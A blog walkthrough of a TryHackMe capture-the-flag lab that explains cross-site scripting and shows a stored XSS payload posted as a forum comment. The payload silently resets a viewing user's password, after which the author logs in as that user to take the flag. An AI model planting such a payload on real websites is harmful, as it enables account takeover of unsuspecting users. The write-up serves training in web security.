-->

  • TryHackMe Web Exploitation Pesky Elf Forum XSS

     

    TryHackMe Web Exploitation Pesky Elf Forum XSS

     

     

    We are back with Day 5 of the “ Advent of Cyber” event by TryHackMe. If you haven’t solved the Previous Day challenge click here.

    This challenge is again based on Web Exploitation and the task is named Pesky Elf Forum. TryHackMe Web Exploitation Pesky Elf Forum XSS



    Learning Objectives:


    • What is an XSS vulnerability?
    • What Types of XSS vulnerabilities are there?
    • Challenge Walkthrough.




    What is an XSS vulnerability?


    Cross-Site Scripting, better known as XSS in the cybersecurity community, is classified as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users.


    If you can get JavaScript to run on a victim’s computer, there are numerous things you can achieve. This can range from stealing the victim’s cookies to take over their session, running a keylogger that will log every key the user presses on their keyboard while visiting the website, redirecting the user to a totally different website altogether or performing some kind of action on the website such as placing an order, or resetting their password etc.



    What types of XSS vulnerabilities are there?



    1. DOM
    2. Reflected
    3. Stored
    4. Blind





    Let’s Get Started..

    1. What flag did you get when you disabled the plugin?

     

     

    TryHackMe Web Exploitation Pesky Elf Forum XSS

     

     

    Login using Username: McSkidy Password: password

    Leave a comment on any post as Follow <a href="https://www.kumaratuljaiswal.in">kumaratuljaiswal.in</a>


     

    TryHackMe Web Exploitation Pesky Elf Forum XSS

     

     



    Once your comment is posted, you’ll see that the word ‘kumaratuljaiswal.in’ has been underlined.

     

     

    TryHackMe Web Exploitation Pesky Elf Forum XSS



    This means the comment is reflected as you wrote it without the underline HTML tags being stripped out. As this isn’t being stripped out, you can try the HTML script tags instead to see if the website will run any JavaScript that is entered.



    Using the URL, you found earlier for changing the user’s password, you can try the following payload:


    <script>fetch('/settings?new_password=pass123');</script>

     

     

    The <script> tag tells the browser we want to run some JavaScript, and the fetch command makes a network request to the specified URL.

    After posting the above as a comment, you could view the webpage source to see whether it has been shown correctly. The screenshot below shows us that the script tags aren’t being stripped out or disabled and, in fact, are working:


     


    TryHackMe Web Exploitation Pesky Elf Forum XSS


     

     


    Now that we have this XSS running on the forum, it means that any logged in users viewing the thread will automatically have their password changed to pass123. So let’s log out and see if the Grinch has visited the thread by trying to log in as them (It may take up to a minute before the Grinch visits the page and their password changes).



    Username: grinch

    Password: pass123



    Once logged in, go to the settings page again, and this time, you’ll discover another feature with the option to disable the Christmas to Buttmas plugin.


     

    TryHackMe Web Exploitation Pesky Elf Forum XSS

     


    Disable the plugin, and you’ll be awarded a flag.

     

     

    TryHackMe Web Exploitation Pesky Elf Forum XSS


     

    Done :-)

     

     

     

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     

  • 0 comments:

    Post a Comment

    For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.